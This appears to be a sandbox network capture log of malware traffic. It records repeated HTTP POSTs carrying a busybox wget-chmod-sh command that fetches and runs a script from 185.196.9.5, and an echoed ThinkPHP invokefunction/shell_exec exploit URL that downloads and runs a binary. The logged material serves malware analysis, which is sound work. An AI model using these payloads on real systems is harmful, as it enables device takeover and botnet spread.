2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 32 35 20 46 65 62 20 32 30 32 34 20 31 38 3a 30 33 3a 35 32 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 4a 4a 4e 2d 30 31 49 57 56 32 30 38 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 25 Feb 2024 18:03:52 GMT<br><span class="F">IP: 89.149.18.20</span>Node information: PS-JJN-01IWV208<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/
Feb 25, 2024 19:03:52.518400908 CET	455	IN	Data Raw: 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 Data Ascii: equests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fun
Feb 25, 2024 19:03:52.518439054 CET	1286	IN	Data Raw: 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 Data Ascii: x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65db8108_PS-JJN-01IWV208_5755-2230<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="
Feb 25, 2024 19:03:52.620142937 CET	455	IN	Data Raw: 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 Data Ascii: equests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fun
Feb 25, 2024 19:03:52.828068018 CET	455	IN	Data Raw: 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 Data Ascii: equests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fun

Session ID	Source IP	Source Port	Destination IP	Destination Port
564	192.168.2.15	49110	31.136.99.204	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.150958061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:52.709801912 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:53.829916954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:56.133733988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:00.741853952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:09.701689005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:28.133475065 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.997071028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
565	192.168.2.15	55114	95.216.114.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.164722919 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:52.361037970 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
566	192.168.2.15	40730	94.121.25.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.238389969 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
567	192.168.2.15	60782	85.172.11.91	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.419142962 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:53.765707016 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
568	192.168.2.15	35682	94.120.153.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.895848036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
569	192.168.2.15	38074	94.123.67.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.909516096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
570	192.168.2.15	37336	95.182.234.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.958048105 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:53.147810936 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:53.625796080 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:54.247608900 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:55.359534979 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
